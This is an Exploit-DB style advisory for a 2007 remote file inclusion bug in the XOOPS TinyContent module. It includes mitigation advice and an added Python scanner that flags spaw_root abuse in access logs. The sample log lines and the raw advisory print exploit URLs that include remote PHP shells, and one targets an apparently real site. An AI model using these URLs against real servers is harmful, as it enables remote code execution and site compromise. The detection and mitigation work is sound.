Vendor: XOOPS Module TinyContent
By: Sp[L]o1T
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: XOOPS Module TinyContent
Affected Version From: < 1.5
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

XOOPS Module TinyContent Remote File Inclusion

This vulnerability allows an attacker to include remote files on the server by manipulating a parameter in the URL. The vulnerable file is 'spaw_control.class.php' in the 'admin/spaw' directory of the TinyContent module for XOOPS. The script uses the 'spaw_root' parameter as the base path of an include, so pointing it at a remote file makes the server fetch and execute attacker-supplied PHP code.

Mitigation:

To mitigate this vulnerability, update the TinyContent module to version 1.5 or above. Additionally, sanitize user input and validate file paths before including them in the code: an include path should be derived from a fixed, server-side configuration value, never from request data. As a defence in depth, disabling allow_url_include (and allow_url_fopen where the application does not need it) in php.ini prevents include() from fetching code over the network regardless of the module's own handling.
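As an added example (not part of the advisory or of the module's code), the following Python script flags requests aimed at this bug in a Common Log Format access log: it decodes the spaw_root value, including a second layer of percent-encoding, and separates remote-include attempts from other tampering with the parameter. The log lines, client addresses and the attacker.invalid hostname are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path and parameter named in the advisory. spaw_root is meant to be set by the
# module's configuration, so any copy of it arriving in a request is suspect.
VULN_PATH = "/modules/tinycontent/admin/spaw/spaw_control.class.php"
VULN_PARAM = "spaw_root"

# Common Log Format (Apache/nginx default); only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Stream wrappers that make PHP's include() fetch the file over the network.
REMOTE_RE = re.compile(r'^(?:https?|ftps?|php|data)://', re.IGNORECASE)


def classify_target(target: str):
    """Return ('rfi', value) or ('param-tamper', value), or None if not relevant."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(VULN_PATH):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get(VULN_PARAM)
    if not values:
        return None  # the script was requested without the injectable parameter
    # parse_qs removes one layer of percent-encoding; strip a second one too,
    # since double-encoding is a common way past naive string filters.
    value = unquote(values[0])
    kind = "rfi" if REMOTE_RE.match(value) else "param-tamper"
    return kind, value


def scan_log(lines):
    """Return (client, kind, value) for every log line that targets the bug."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than guess at the layout
        verdict = classify_target(m.group("target"))
        if verdict:
            hits.append((m.group("client"), *verdict))
    return hits


# Constructed sample log lines (RFC 5737 test addresses, reserved .invalid TLD).
SAMPLE_LOG = [
    '198.51.100.9 - - [12/Jun/2007:10:00:01 +0000] "GET /modules/tinycontent/index.php?id=3 HTTP/1.1" 200 812',
    '203.0.113.5 - - [12/Jun/2007:10:00:07 +0000] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://attacker.invalid/shell.txt? HTTP/1.0" 200 5120',
    '203.0.113.5 - - [12/Jun/2007:10:00:09 +0000] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=%2568ttp%253A%252F%252Fattacker.invalid%252Fshell.txt%253F HTTP/1.0" 200 5120',
    '203.0.113.5 - - [12/Jun/2007:10:00:12 +0000] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=/tmp/ HTTP/1.0" 500 0',
]

if __name__ == "__main__":
    for client, kind, value in scan_log(SAMPLE_LOG):
        print(f"{client}\t{kind}\t{value}")
```

The trailing `?` in the decoded value is the trick the raw advisory uses so that whatever the script appends to spaw_root becomes part of the remote URL's query string instead of its path.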

Exploit-DB raw data:

~~~~~~~~~~~~~~~~~~~~~~~
XOOPS Module TinyContent Remote File Inclusion
version: < 1.5
source: http://prdownloads.sourceforge.net/xoops/xoops2-mod-tinycontent_1_5.zip
~~~~~~~~~~~~~~~~~~~~~~
Discovered by Sp[L]o1T from hTTP://hacking.3Xforum.Ro
~~~~~~~~~~~~~~~~~~~~~~
BUG:
http://www.site.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt?

Vuln site:
http://www.wiscpsa.org/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ekin0x.com/r57.txt?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Shoutz t0: all members of Hacking[dot]3xforum[dot]ro ,V1rg0 ,Str0ke
Contact: splo1t[at]yahoo[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# milw0rm.com [2007-06-12]